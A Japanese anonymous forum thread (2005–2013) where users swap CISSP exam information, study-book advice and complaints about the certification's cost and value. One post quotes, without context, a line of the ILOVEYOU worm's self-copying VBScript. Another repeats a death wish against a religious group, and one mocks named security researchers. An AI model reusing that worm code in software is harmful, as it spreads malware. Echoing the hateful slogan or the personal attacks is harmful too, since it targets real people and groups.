【資格】CISSP

1 ：2005/09/15 〜 最終レス ：2013/09/17

CISSPについて情報交換しましょう！
●CISSPとは
(ISC)2（International Information Systems Security Certification Consortium）が認定を行っている国際的に最も権威あるセキュリティ専門家認証資格です。
●(ISC)2
https://www.isc2.org/japan/

2 ：

●出題範囲
CBK（Common Body of Knowledge）と呼ばれる以下の10ドメイン
についての知識や能力が問われます。
1. 情報セキュリティマネージメント
2. エンタープライズ･セキュリティアーキテクチャ
3. アクセス制御のシステムと方法論
4. アプリケーションセキュリティ
5. 運用セキュリティ
6. 暗号学
7. 通信・ネットワーク・インターネットのセキュリティ
8. 物理セキュリティ
9. 事業継続計画
10. 法・捜査・倫理
●試験内容
問題数 ： 250問（日本語・英語併記）
試験時間：　6時間
出題形式： 4択マークシート
受験費用：　68,250円(税込)

3 ：

●試験開催予定日（2005年までの情報）
第1回　 2004年07月11日 受付終了
第2回　 2004年09月12日 受付終了
第3回　 2004年11月14日 受付終了
第4回　 2005年01月23日 受付終了
第5回　 2005年03月13日 受付終了
第6回　 2005年03月20日 受付終了
第7回　 2005年05月15日 受付終了
第8回　 2005年06月12日 受付終了
第9回　 2005年07月10日 受付終了
第10回　2005年09月11日 受付終了
第11回　2005年10月09日・・・受付中！
第12回　2005年11月20日

4 ：

9月11日の第10回受けた人結果でました？
皆さんの結果教えてください〜

5 ：

午前1時頃来てました。

6 ：

合格age

7 ：

10/9の試験に向けて勉強中。
日本語の公式本もまだ手に入らず、ちょっとあせってます。
CISSP QUIZでは50％強しかとれない。
皆さんはどんな勉強で合格したのですか？

8 ：

明日試験だー。
アクセス制御がぜんぜんわからないぞ。
任意だか、強制だか、役割ベースだか、知ったこっちゃないっつーの。
そんな理屈よりもちゃんと運用されていることのほうが重要だっつーの。
ということで、試験記念age。

9 ：

>>7
ぶっつけ本番でいけました〜
がんばってくださいね！
>>8
ちゃんと運用できるような人だったらたぶん合格しますよ〜
当然わからない問題も多いですが、合格点には届くと思います

10 ：

☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆
対話式おすすめアイテムの紹介！
http://blueskyinf.seesaa.net/
☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆

11 ：

>>9
ﾓﾏｴ ｲｲﾔﾂﾀﾞﾅｰ
�dクス
いざ出陣！雨が降ってるけどメゲない！

12 ：

>>11
前回の試験は雷雨でした。
検討を祈る！

13 ：

>>12
とりあえず帰ってきた。
250問は長かった・・・
身も心も疲れ果てた。
試験内容について詳細なことは語れませんが、難しく感じたなぁ。
合格するかどうかは5分5分くらいかな･･･

14 ：

合格した！ENDORSEMENT FORM書かなくちゃ。
記念age

15 ：

>>14
おめでとage

16 ：

>>15
アリガ�d
これからがんばって維持ポイントの獲得にハゲむよ。

17 ：

日本語本買いました。
これからガンガリます！！

18 ：

>>17
漏れでも何とかなったんだから
喪前も何とかなる
ｶﾞﾝｶﾞﾚ!!

19 ：

公式ガイドブック買いました。来年中の合格を目標にがんばります。
合格された皆さんはどのくらいの期間勉強されました?

20 ：

>>19
正直ひと月弱くらいでした。
でも、一応UNIXなどのシステム管理者歴は10年以上、
職場での情報セキュリティの取りまとめ補佐などの
経験があったので、そのくらいの期間で何とかなったのかも。
独特の用語とかがあったので、それを今までの知識にマッピングする作業でした。
あとは、無理矢理の暗記が2-3割くらいかな。
最後の1週間はひたすら問題を解きまくって、
その解説を読むという繰り返しでした。
ガンガってください。

21 ：

この試験受かった方、セミナーは受講したのですか？　公式本を購入して、一人で勉強してから受けようと思っているのですが、そんなレベルでは受からない試験なのかなぁ？
公式本の練習問題だけでは少ない気がして。

22 ：

Quizの問題を流し込んでｺﾞｿｺﾞｿ

23 ：

JPのホームページ死んでるページあるけど何でだろう
申し込みができんじゃないか

24 ：

金がなくて更新できないんだろう

25 ：

この資格って、取った後更新が結構労力掛かるんでしょうか、
それとも大した事無いのでしょうか。
ポイントを獲得していくみたいですが
皆さんどうしているのでしょうか。
(どうするのが一番効率的か。)
人依存のとこもあるでしょうが。

26 ：

60万円のセミナーは受けられないので、
本を買って独学で受験しようと思っているのですが、同じような方法で合格した方いますか？
いまだと、「CISSP認定試験 公式ガイドブック 」しか参考書はないですよね。。

27 ：

あげ

28 ：

試験受けた。さっぱり分からんかった。
職場で次も受けろとうるさい割には、仕事を山のように押し付けるし…
次、受けたくない…

29 ：

63万円のセミナーを皆さんは受講されているのですか？
受講されているとすれば、個人持ちですか？
もしくは勤務先持ちですか？

30 ：

>29
業務上必要なら会社持ち。
必要ないなら個人持ち。

31 ：

ついに試験日だ
10時出発です
ちなみに練習問題といたら６．４割でした！
合格微妙です

32 ：

受けてきた
手ごたえはまぁまぁ

33 ：

合格通知もらいました

34 ：

同じく、いさかじゅうぞう。　＾＾Ｖ

35 ：

俺も将来はこの資格とるよ。
まずセキュアドから頑張ってきます

36 ：

関係ないかもしれないけど専門の情報セキュリティー行こうと思うんだけど周りが凄そうで取り残されないか不安なんですよ｡
1から学ぼうとしてる俺じゃ無理ですかね？(もちろんセキュリティに全く無知って訳でもないですけど)

37 ：

保守age

38 ：

保守age

39 ：

CISSP保持者の皆さんは、年収いくらですか？

40 ：

350万円。

41 ：

参考図書教えてください
日本語は
CISSP認定試験 公式ガイドブック
英語版は
CISSP All-in-one Exam Guide (All-in-One) (ハードカバー)３版
Cissp All-in-one Exam Guide (All-in-One) (ハードカバー) ４版
感想があれば教えてください。

42 ：

>>41
独学ですか？　
SecureOS とか、セキュリティ系の概念にあんまり詳しくないのであれば、
情報セキュリティ技術大全を読んでから、公式ガイドを読むのがよいかもしれません。

43 ：

>CISSP認定試験 公式ガイドブック
読んでて意味わかんね。
>Cissp All-in-one Exam Guide (All-in-One) (ハードカバー) ４版
まとも。英文もきれい。

44 ：

とりあえず、 2月の試験で合格しました！　
これから職務経歴書を書かなきゃ。
CISSP の勉強されている方へ、頑張ってホルダーになってください。

45 ：

いろいろご意見いただきありがとうございます。
まずは読んでも意味がわからない本を購入したので独学してみます。
セキュリティの本は少なくて高いから厳しいです。さらに持ち運び不便な厚さ。
9月目標です。資格は。

46 ：

つーか勉強しないと受からない連中は、CISSP取っても意味無いよ。
何も見ないで一発合格が当然。当然オレは去年１発合格。
受けてるやつの質が悪いから、日本の合格者が増えないんだな。
日本は職歴をもっと厳しく設定したほうがいいと思うね。

47 ：

age

48 ：

先週受けたのですが、まだ結果がこないです。
受けたみなさん、どれくらいで結果が来ましたか？

49 ：

2週間ちょい。

50 ：

認定者1000名超えage

51 ：

日本でもずいぶん長くやってるのに、やっと1000名越えかぁ。
資格ビジネスでCISSP扱っている会社は辛いだろうね。
ヨーロッパでも増やしていかないと先が無いな。

52 ：

>>49
ご教示ありがとう。
うぅ、もうしばらく悶々と暮らさなきゃならないのか。
苦しいね。

53 ：

CISSPの結果発表で苦しいのは、いつ発表されたっていう情報を正確に共有できないことだね。
CISSPに受かる程度に物事を分かっているのであれば、(ISC)2が合格者毎に通知時期をずらして、
そういう情報を公開した人間を絞り込むかもしれないと、その程度のことは想像できるだろうから。
結果、「リスクに見合うメリットが得られない」という、至極CISSP的にまっとうな理由で、
情報共有ができなくなると。
あ、今気付いたのだけど、昨今のオープンソースなどによる、実体やソフトを問わない
あらゆるもののコモディティ化はこういうガバナンスで押しとどめられるのかもしれないね。

54 ：

突然にセキュリティ部門担当になりました。
CISSPを来年には合格するように言われてますが60万の講習料は出ません。
独学でとなるのですが、まだセキュリティ関連の知識に疎いため、
●情報セキュリティ技術大全
を購入して読もうと思っています。
その後なのですが、
●CISSP認定試験 公式ガイドブック
●CISSP-行政情報セキュリティ認定試験 公式ガイドブック
とあるようなのですが、双方ともに読んだ方がいいのでしょうか？
あと、独学での教材として何かお勧めのものがありますでしょうか？

55 ：

遅レスですが。>>54
CISSP-JP（行政ね）の方は不要だと思います。地理の受験科目と言われていて、
現社のテキストは不要でしょう。ただ、該当するCISSP公式ガイドブックもそれほど
よいというわけではないです。必須ですが。
正直、会社に言われたから取るというだけでなく、より長期的に検討したほうがいいでしょう。
CISSPを言われるがままに取ったとして、あるいは落ちたとして、会社は自分をどう扱うのだろうか
ということです。
さらにCISSPは検定の一つです。ですから、箔としてどれくらい効用があるのかを理解する必要が
あるでしょう。CISSPの名称が使えるのは、CISSPの価値を認めている会社での箔だけなのです。
転職には、それなりに有利に働くと思いますが。
CISSPを取れと会社に言われたということは、あなたの会社もCISSPに価値を見出しているのは
確かでしょう。ですが、会社が「セミナーなしでCISSPを取れ」といった場合、本当にあなたがCISSPを
取る事を望んでいるのかどうかは考えたほうがいいです。
もし会社が何らかの理由であなたを排除するためにセミナーなしでCISSPを取れと
言っているのであれば、取らないとクビやそれに準じた酷い扱いを受けるでしょうし、
取ったら取ったで、やっぱり排除されるわけですね。
もし会社が、「欲しい人材はCISSPを取れる人間だ、でも教育費なんか恵んでやらん」
というのであれば、取らないとやっぱりクビやそれに準じた酷い扱いを受けるでしょうが、
取れば希望があるかもしれません。
もし会社が「取れなくてもいいが、まずは頑張って欲しい」というのであれば、
会社を信頼して独力で頑張って、うまくいけば人に負けない希望があり、
うまくいかなくても絶望というわけではないが、ほかの人に抜かれる可能性は
あるかもしれません。
こういう観点で、いろいろなケースを何重にも考えてみる必要があると思います。

56 ：

CISSPホルダの私としては、もし、貯金があって、今勤めている会社のランクも、
将来の転職時に有利に働きそうな会社であれば、「会社に内緒で自腹を切って
CISSPセミナーに参加する」というのもありかと思います。
特に、会社がそれなりに良い会社であれば、将来の勝ち組に向けた大きな
転職もありうるし、会社の鼻をあかすチャンスでもあるためです。
たとえば今、130万の新車を買う予定なら、それを我慢して50万の中古車にする
ぐらいいいんじゃないかと私は思います。
ただ、逆に、大きな転職が難しく、またCISSPを取らなくてもあまり大きなペナルティを
課されないのであって、次の転職先もCISSPも知らないような会社の可能性があるのなら、
CISSPを取るのに自腹50万なんて大金を払うのももったいないと思います。
まぁ、加えて、私は既にCISSPのセミナーを受けていて、CISSPホルダになっていて、
50万円のCISSPセミナーが私にとてもよく合っていることを知っている今だからこそ、
こういうことがいえるのですけどね。特に人によってはセミナーは全然合わないかもしれませんから、
うまくいかない可能性ももちろんありますし。

57 ：

>>55
54です。
書き込み以降、
●情報セキュリティ技術大全
●CISSP認定試験 公式ガイドブック
の二冊を手に入れて、勉強をしています。
並行して、セキュリティの仕事に従事しています。
クビ、排除と物騒な言葉が並んでますが、>>55の会社ではそういった事が
横行しているのでしょうか？
かなり話が飛んでしまっているので、、、

58 ：

>>54
来年取れと言われたのであれば、試験以外の認定条件はパスできる
経験があると言うことでしょうから、１年あればセミナー無しで合格できると思います。
私の会社でセミナー受けてる人はいませんが、だいたい1回で合格してます。
公式ガイドブックも間違いがありますから、英語が苦にならないのであれば
英語版をお勧めします。それからALL in One CISSPで大体カバーできます。

59 ：

試験開催の間隔が広がるのかな？3月の次は6月になってる。。。
http://www.isc2.org/japan/how_sche_exam.html

60 ：

>>58
CISSP All-in-One Exam Guideなのですがamazonで見てみると何種類かありますが、
最新のものだけを購入すればいいのでしょうか？
現在、2010/1/29のものが予約受付中になっていますが、随分先の発売のため
2007/11/9発売の他のものと色が異なる青のタイトルのものが現在、発売されている
ものの中では一番新しいものになります。
問題集はこれ一冊で大体、大丈夫でしょうか？

61 ：

すんごい過疎

62 ：

あまり有用じゃない事がはっきりしちゃったからね。

63 ：

いい加減、この資格が落ち目という事がここの過疎化に現れているのかな。
CISSPよりもCISMの方がまだマシだという事が日本での認識なのかな。
CISSPは取得後のランニングコストがバカみたいにかかるしね。
他にも研修費もバカみたいに高い割に独学と変わらないレベルだし、ここで書いてる人もいるけど、取得してもしなくても一緒みたいな意見が本当のところなんじゃないのかな。
そもそもセキュリティは利益をうまなく、負担になるという認識が一般的だし、この不景気の中、CISSPが活躍できるような場はないよ。

64 ：

この資格は？
http://pc11.2ch.net/test/read.cgi/sec/1234179309/l50

65 ：

製造業であれ、ネットバンキングであれ、
セキュリティなんてやって当たり前なんだよ。
セキュリティ単体ではビジネスにはならないよ。
詐欺師になる覚悟があれば、不安を煽って金を取れば良いが、
それじゃおれおれ詐欺と大してかわらん。

66 ：

金カネウゼー奴だな

67 ：

金　金　金　金　カネ　カネ　カネ　カネ

68 ：

セキュリティビジネスを否定する奴は多いけど、事業会社、政府機関もセキュリティの専門家を必要としてる。
実際に仕事はたくさんある。
食えないのは、仕事の範囲が狭いか、レベルが低すぎる。
CISSPの体系は良く考えられていると思う。セキュリティの入門には最適じゃないか。

69 ：

>>68
政府をそそのかしてカネを取ってこないと、
ほとんどのセキュリティ専門の会社はアポーン決定 www
ダニになったつもりでたかり続けてください。

70 ：

>>69
この程度の書き込みしかできないのか。
相手する気にもなれん。

71 ：

68さんはもう逃げちゃうの？面白くないな。
まあ事実に反論するのは難しいわな www
さらしあげ

72 ：

素人相手にこんな話した俺が馬鹿だった。

73 ：

68さんはどんなビジネスしてんだか。
生きてて恥ずかしくないの？
もっとまともな仕事があるだろうに。

74 ：

セキュリティは国内ではもう終わったよ。
今でも日本は先進国の中でもセキュリティは遅れをとっているけど、そもそも日本の経営者たちが真剣にセキュリティに取り組もうという意識がないから。
Pマークは形骸化しているし、ISO27001も単なる某大手さんが取引条件にしたために、取得企業が二年前までは多かったが、これも真剣に企業内での活動がなされず、単なるペーパー化している。
さて、CISSPがどういう扱いを受けているのか、実情を本当は1番分かっているんじゃないのかな？
取得まで苦労したのは分かるが、ただ周囲の素人さんからちやほやさらるのが関の山で、実際の業務ではどうなんだろうね。
単なる自己満足になってないか？

75 ：

金にはならないけど、勉強するには良いと思う。体系立てて学べるから。
でもセキュリティは奥が深いから、CISSPをとってもビギナーレベルだよ。
実践で鍛えていかないとね。

76 ：

>>75
初心者レベルの資格を取っても意味はないんじゃないの？

77 ：

>>76
資格を取る事に意味はなくても、勉強をする意味はある。

78 ：

>>77
という事は勉強に意味があるのであって、CISSPという資格自体には取得価値がないという事を77も認めるという事かな。
漏れも今までセキュリティの仕事をし、当然、勉強もしてきた事や同業他社のセキュリティマネージャやコンサルタント、監査人等の意見もCISSPに関しては同意見なんだよ。
大切なのは資格でなく経験である事は誰でも分かってる事だが、それにせても、ここまで言われる資格もなぁと。

79 ：

>78
知らない人の名刺にCISSPと書いてあれば、その人とは専門家として共通の言葉で話せると期待できるかな、くらいですかね。投資対効果で考えれば、この資格を取る意味ないですね。
まあ、目標を持って頑張っている人には頑張ってもらえばいいんじゃないですか。

80 ：

過疎ってるのは人事(セキュリティ畑で無い人がほとんど)が知らないだけでしょ。
役職によっては必須な場合もある。
主に外資系だけど。
CISAなんかは不必要な人には延々不必要だが、CISSPは万人って言ってもいい。

81 ：

人事は関係ないだろ www

82 ：

>>80
CISSPは万人が必要ないって事だろ。
そもそも、CISSPを人事が知らないって訳ではないよ。
セキュリティ云々なんて騒がれたのは二年前がピークで、実際のところ、情報セキュリティ事故程度では企業が倒産まで追い込まれる事は極稀で、それよりも重要な課題が企業には出てきた。内部統制なんかじゃないがね。
うちの顧客はセキュリティからそっちにほぼシフトしてる。
顧客一同、CISSPをよく知っているが、今では下火で好き好んで受験する人間も少なくなってる事も知ってる。
俺も資格関連は一応取得してるが、CISSPは取得こそしたが、燃費が悪い上にパフォーマンスの悪い車を買ったような気分。

83 ：

2009/02/22受験で合否通知来た人いる？
今回は若干 受験者が多かったから、2週間くらいかかるんかな？
でも、なんでここのところ毎月試験あったのに
3月の次が6月なんだろ？
　

84 ：

受ける人いるんだね。

85 ：

少なくとも、2月3月はキャンセル待ちだから、
かなりの数 いるんじゃない。
　

86 ：

終了

87 ：

いやね。ISC2が発表している各国のCISSPの人数がUS以外、12月よりも減少してるんだよ。
知り合いでCISMとCISSP双方の資格を持ってる人間で最近になってCISSPの資格は役に立たない割にコストばかりかかるという理由で維持を諦めたのが2人いたので、毎月、ISC2が公表しているCISSPの各国の人数をチェックしていた。
12月から次の更新までの推移を見ると、日本等、US以外の各国でCISSPの人数が減少していた。
理由は色々あるかと思うが、意図的に更新をしない人が世界的にも増えているという事だ。

88 ：

過疎化あげ

89 ：

終了

90 ：

会社で４年前ぐらいにとらされました。
試験はあっさり通ったのですが、維持がとにかく大変。
維持するためのクレジットをとるためにはかなり努力、というかお金が必要。
有料セミナーも同じようなものばかりだし。しょせん某会社とか某組織が
儲かるためだけにあるのではないかと・・・
うちの同僚もばかばかしくなって、更新をしませんでした。
私も次回はどうするか考え中。
割とセキュリティの最前線の仕事をしていると自負しているけど、
正直あまり役に立ったという感じがしない。

91 ：

2008年セキュリティ市場の全体の売り上げの前年比の約4割減。（某調査機関データより）
セキュリティ事故件数も前年比約2割減。
今年は市場全体の売り上げは昨年よりも激減すると予測され、向こう5年は昨年の売り上げまで戻らないとの予測。
CISSPの人数が二ヶ月連続で減少している事からも日本ではセキュリティ関連も終了の兆しが見えてきたって事。

92 ：

>>90
俺の知り合いも同じようにCISSP資格を持っていたが、維持費に金かかり過ぎるし、セキュリティの仕事してても仕事では何の役にも立たないという事で、更新を放棄したって言ってた。
CISA,CISMと取得した後にCISSPを取ろうかなと思っていたが、更新維持費がかなり高額と周囲から聞かされていた事もあり、躊躇していたけど、下手に取得しなくて良かったと思ってる。

93 ：

二ヶ月連続でCISSPの人数減ってたけど、今回の更新では日本はちょっとだけ増えてるね。
今回、減ってたら終わってたな。

94 ：

しょせん某会社とか某組織が
儲かるためだけにある

95 ：

そういう事かな。
心配しなくても某会社の社員で実はセキュリティの仕事を何もしていない
人間の有資格者が増加しているだけの話。
資格そのものもMCPのように陳腐化しているので、もうダメだろ。

96 ：

某会社とは？

97 ：

それを言っちゃあ、おしまいよ

98 ：

ちっこい地球？

99 ：

エスパー登場!

100 ：

ISC japan のトップページ、レイアウト崩れてるね。
https://www.isc2.org/japan/Default.aspx

101 ：

8月の試験での合格を目標に独学で勉強を始めたところです。
何冊か参考書は買ったのですが、
どの本の問題を集中的に解いていったらいいのか分かりません。
合格された方はどの本の問題を解いて試験にそなえたのでしょうか？
よろしくお願いします。

102 ：

自分はこれ一冊のみでした
ttp://www.amazon.co.jp/CISSP-Certification-All-Guide-Fourth/dp/0071497870/

103 ：

試験までどのくらいの勉強準備期間を用意しましたか？
以前、ITILの試験は2週間ほど(平日1時間、週末２時間)くらいで合格できました。

104 ：

>>102の本を一回読んだだけです。
集中して時間を割かず、空いた時間に少しずつ読んでいた感じです。
出題範囲が広いから、特殊な内容を問うわけではなく、
どちらかというと常識問題って感じでした。

105 ：

>102
お返事ありがとうございました。
私も教えていただいた本を以前買って持っているので、
その本に集中して勉強しようと思います。

106 ：

そうですね。
仕事で少しでもセキュリティに関係していたり、他にセキュリティ関係の資格の勉強を
した経験のある人なら、本を一回読むだけで十分かと思います。
私も２週間の勉強で合格できました。

107 ：

これ取って意味あるの？？
公式サイトも崩れてるし、もう赤字でヤバイいんでは？
取った人の話聞いてもメリット感じないし。

108 ：

有資格者です。
今ではセキュリティ市場はかなりの縮小傾向にあるため年間維持費が高額であるCISSPは
取得してもメリットはありません。
CISSP関連ビジネスに関わらずセキュリティに関連する事業をメインとしていた会社の多くは大変です

109 ：

>>107
セキュリティ系のカンファレンスの講師でもそんなに持ってる人は多くない
ttps://reg.cmptech.jp/public/application/add/236?lang=ja
資格なんかなくても大丈夫って考えられるし、
普及してないとも考えられるし。

110 ：

今日受ける人いる?

111 ：

>>109
資格なんてなくても大丈夫っていうほどのものなんだよ。CISSPって。
所詮そこまでのもの。

112 ：

これ取っても意味ねーよ。IPAの情報セキュリティスペシャリストの方が評価される。

113 ：

>>112
SUはねえよw
今はISMS審査員とかだろ。

114 ：

ISMS審査員なんてＣＩＳＳＰよりも評価されない。
だって受講すれば誰だって合格できる代物。

115 ：

CISS3P

116 ：

>>110
で、どうだった？

117 ：

CISSP持ちです。
今日IPAのSCうかった。SCは合格率が16%だそうな。
かなり高い。うーん。
でも、SCは誰でも知ってるから話の種にならないけど、
CISSPはあまり知られてないから、その分話の種になる資格ではあるよ。
面接などのネタ作りには適してると言えると思う。
まぁ、費用対効果を考えると泣けるし、
かといって費用対効果を考えないCISSPはCISSPに値しないし、
なんともかんとも、もにょる感じだけどね。
まぁ、近い将来報われるとうれしいなっとおもって頑張ってるよ。

118 ：

Pマーク審査員どうよ？
取得者が圧倒的に少ないんだが・・・
ＩＳＯ審査員　2万人　10万社取得
ＩＳＭＳ審査員　5千人　3千社取得
Ｐマーク審査員　8百人　1万社取得

119 ：

受かった〜〜〜〜〜〜、気がする。(^.^)

120 ：

8月末受験された方もう結果きましたか

121 ：

今さっき来てたよ。ｗ

122 ：

CISSPをとろうと思って海外の同僚に聞いたら、
EC CouncilのCEH(Certified Ethical Hacker)の方が実践的でオススメと言われました。
どなたか持っている方いますか？

123 ：

　

124 ：

●全世界にウ○ツキ評価を公表している機関の（おまけにそれもトップページ）
会議に参加する小学校の児童カウンセラーとして立派に再起を果たして学校のホームページにも名前が掲載されている
シマソテックの面々
■http://www.virusbtn.com/conference/vb2009/programme/index
*Sumesh Jaiswal　←スポークスマンぽい！？
ほいじゃあ印をｼﾞｶﾘﾝで（微笑）
ttp://www.symantec.com/content/ja/jp/home_homeoffice/images/microsites/nis_nav/awards/microsite-vb100-award.gif
*Carey Nachenberg　←検出技術を開発したりなど技術畑の人（その後、労務に上がれないと見るや本執筆で老後資金ゲットだぜ!?）
↑よそがまず検出率に重点を置いていた頃にサボタージュ。今に至っても未だにツケが清算し切れぬ十字架サボタージュ。
*Vijay Seshadri　←只のカバン持ち!?
*Zulfikar Ramzan　→超注目！！★現Architect and Technical Director職★
→顔（ｼﾞｶﾘﾝ） ttp://www.symantec.com/content/en/us/about/bios/images/large/zulfikar_ramzan_lg.jpg
*Candid Wueest　←ｸﾞｸﾞﾙと（記述: Candid Wueest）といっぱい出てくる人　
→顔（当日の当人） ttp://www.virusbtn.com/images/conference/2009/photos/Anoirel_Issa/VB2009_AI_Dsc03315_med.jpg
（ネクタイスーツで昼間から飲んじゃうお呼ばれの酒はサイコーだぜ）
2009年9月ジュネーブ会議にて
●全世界にウ○ツキ評価を公表している機関の
会議に参加するIBM
Martin Overton さん　※ 出張届・出張報告書受理
●全世界にウ○ツキ評価を公表している機関の
会議に参加する10万人以上の従業員を有しているAIG Europe
（アメリカンインターナショナルグループ：アメリカ合衆国ニューヨークに本拠を置く保険会社）
の、おそらく社内セキュリティ担当かなんかの人
Pascal Lointier さん　※ 出張届・出張報告書受理
（Rev.8.2）ノートン警察（）笑　http://www.youtube.com/watch?v=FnEYTf3zyMk

125 ：

>>119
まあ一通り仕事覚えたうえで上司の指示か許可を得て取った資格ならな
無職のくせに何か勘違いして資格だけ取っちゃった奴は例外なく無能

126 ：

Rのにおい……
なめたことあるからおれ知ってるもん
ver. jc 2 年生おR (とろける舌触り) ｻｲｺｰ

127 ：

CISSPの実態と書いてあるブログがあった。
http://geekmia.blog31.fc2.com/blog-entry-46.html
たしかに、資格商売のように思えちゃう。。

128 ：

頭悪そうな内容だな。

129 ：

>>127
思えちゃうのではなく、実際に資格商売なのだ。
しかし、ベンダー資格と呼ばれてるものの多くは資格商売になっている。
ＣＩＳＳＰの場合、あまりに露骨なのと、実際にこの資格をもっていても
一般的なベンダー資格と比べて知名度も低いし、役にも立たない。
俺ももってるが、今まで取得した資格の中で一番無駄だったと思ってる。

130 ：

じゃあ更新しないんですね。ｗ

131 ：

>>127
業務上必要だから受講費用も出張費も会社持ちだしそれ故それほど苦でもない。

132 ：

資格商売だからって、悪いわけじゃない。
問題は価格に見合うかと言うこと。
日本ではcisspは見合わない感が大きいけど。
ホルダとしては、価格に見合う様にISC Japanもっとちゃんと働けと言いたいな。
外資相手にはネームバリューがあるんだが。

133 ：

>>132
外資といってもUSでなく、キムチだろ？

134 ：

なんだっけ？維持するためのポイント稼ぎで日経雑誌の定期購読が
ポイント付与の対象になっているのには唖然とした。

135 ：

ISC Japanは木偶だから。

136 ：

>>133
古い煽りにマジレスするのもなんだが、ISCは米国だよ。
んで、外資ウケはいい。
外資の取引先との名刺交換や、展示会のガイジンとの名刺交換、
うちの会社の米国ブランチなんかと名刺交換の際には、
「オメーCISSPカヨ（英語）」と必ず言われるけどね。
ただ、日本では誰も知らない。ISC Japanもっと仕事しろよと。
45ドルのウインドブレーカーは結構便利で、それだけでも大満足です。
…なわけがない。

137 ：

>>135
○川さんに謝れっ！

138 ：

C.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.VBS")

139 ：

こんなカスみたいな資格輸入したの誰だよ。　河野か。　

140 ：

セキュリティ業界のキャリア形成と資格の関係【前編】
情報セキュリティ資格だけで転職や昇進ができるかキャリア形成の一環として、
認定資格の取得に励む情報セキュリティ担当者は多い。
ただし、資格取得が就職や転職、昇進に直結するという考えは、もはや幻想かもしれない。
http://techtarget.itmedia.co.jp/tt/news/1207/27/news08.html

141 ：

ベンダー中立の組織や一部のセキュリティベンダーが、収益源になり得る有望な
ビジネスとして認定資格制度に目を付けるようになってから、認定資格の話題に
一層注目が集まるようになった。

142 ：

今日、情報システムのセキュリティ専門家を認定する「CISSP（Certified Infor
mation Systems Security Professional）」の取得者は8万人、情報システムの監
査専門家を認定する「CISA（Certified Information Systems Auditor）」の取得
者は6万人に上る状況であり、認定資格に対する熱狂は一向に収まる気配がない。

143 ：

ソウカ
死・ね
ソウカ
死・ね　
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね
ソウカ
死・ね

144 ：

まだ学生で取れないけど、いずれは取りたい。
CompTIAのSecurity+取ったけど、本当に実務経験4年で取れるんかな。

145 ：

学生向けのCISSP出ないかな

146 ：

情報セキュリティスペシャリストとどっちが難しいんだろう？

147 ：2013/09/17

勉強の質が違う。セキュリティスペシャリストは実際の構築経験、ベンダー知識、技術知識がものをいうけど、
CISSPは優先順位、バランス感覚などのセキュリティの考え方が問われる。どちらも難関。